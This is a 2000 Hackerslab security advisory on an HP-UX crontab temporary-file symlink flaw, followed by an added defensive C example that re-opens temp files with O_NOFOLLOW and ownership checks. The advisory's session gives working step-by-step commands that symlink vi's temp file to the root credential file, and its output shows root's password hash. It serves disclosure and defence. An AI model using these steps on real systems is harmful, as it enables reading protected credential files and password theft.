
Title: HP-UX crontab temporary file symbolic link vulnerability
Released by: Hackerslab
Date: 23rd October 2000
================================================================================
     [ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link vulnerability
================================================================================







File   :   /usr/bin/crontab
SYSTEM :   HP-UX
           Tested in HP-UX 11.00





INFO :



There is a vulnerability in "crontab" which allows users to read all files
without attaining root or file ownership privileges.

In general, the "crontab" command cannot be run by every user; only users
that are registered in crontab.allow are permitted to run the command.

Using the crontab command with the -e option (crontab -e) executes the vi
editor, and a temporary file is created in /var/tmp/ . The owner of the file
is the current user.

Make a subshell by using the :!sh command in vi, replace the file created in
/var/tmp/ with a symbolic link to the target file, then return to vi and quit.
crontab then prints error messages that show the contents of the linked file,
line by line.



Example) display the contents of /tcb/files/auth/r/root

$ id
uid=101(dubhe) gid=101(swat)
$ uname -s -r
HP-UX B.11.00

$ crontab -e
...
...
~
"/var/tmp/aaaa25923"

### A file named /var/tmp/aaaa25923 is created

~
:!sh

### Make a subshell

$ ln -sf /tcb/files/auth/r/root /var/tmp/aaaa25923
$ exit

### Make symlink and return to vi

[Hit return to continue]
:q!

### Quit vi

root:u_name=root:u_id#0:\
crontab: error on previous line; unexpected character found in line.
        :u_pwd=Of2wgf6SCoIbQ:\
crontab: error on previous line; unexpected character found in line.
        :u_bootauth:u_auditid#0:\
crontab: error on previous line; unexpected character found in line.
        :u_auditflag#1:\
crontab: error on previous line; unexpected character found in line.
        :u_pswduser=root:u_suclog#972084495:u_unsuclog#972084492:u_lock@:\
crontab: error on previous line; unexpected character found in line.
        :chkent:
crontab: error on previous line; unexpected character found in line.
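
Added example, not part of the Hackerslab advisory and not HP-UX code: the
session above shows crontab, after vi exits, reading whatever the /var/tmp path
now points to. The C code below re-opens such a temporary file with O_NOFOLLOW
and checks the descriptor's type, owner and link count before reading;
reopen_edited_file, run_case and the /tmp file names are assumptions made for
illustration.

```c
#define _POSIX_C_SOURCE 200809L /* O_NOFOLLOW, mkstemp, symlink */
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: re-open the edited temp file for a privileged reader.
 * Returns a read-only fd, or -1 unless the path is a plain, singly linked
 * file owned by the invoking user. */
int reopen_edited_file(const char *path, uid_t invoking_uid)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW); /* ELOOP if path is a symlink */
    if (fd < 0)
        return -1;
    /* fstat the descriptor, not the path: checks and reads share one object */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != invoking_uid || /* file belongs to someone else */
        st.st_nlink != 1) {          /* also reachable via another hard link */
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario. swap: 0 = untouched, 1 = symlink, 2 = hard link.
 * Returns 1 if the re-open was accepted, 0 if refused, -1 on setup failure. */
int run_case(int swap)
{
    char tmp[] = "/tmp/crontab_demo_XXXXXX";      /* stands in for /var/tmp/aaaa25923 */
    char target[] = "/tmp/crontab_target_XXXXXX"; /* stands in for the protected file */
    int t = mkstemp(tmp), s = mkstemp(target);
    if (t < 0 || s < 0)
        return -1;
    close(t);
    close(s);
    if (swap) {
        unlink(tmp);
        if ((swap == 1 ? symlink(target, tmp) : link(target, tmp)) != 0)
            return -1;
    }
    int fd = reopen_edited_file(tmp, geteuid());
    if (fd >= 0)
        close(fd);
    unlink(tmp);
    unlink(target);
    return fd >= 0;
}

int main(void) { return !(run_case(0) == 1 && run_case(1) == 0 && run_case(2) == 0); }
```

Dropping to the invoking user's uid before opening the file is a complementary
measure, since the kernel then enforces that user's own read permissions.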





==-------------------------------------------------------------------------------==
       ********
   *    **   **    *
 *      **   **      *
*       ******       *
 *      **   **      *           dubhe@hackerslab.org     [Kyong-won, Cho]
   *    **   **    *             [ http://www.hackerslab.org ]
       ********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------------==







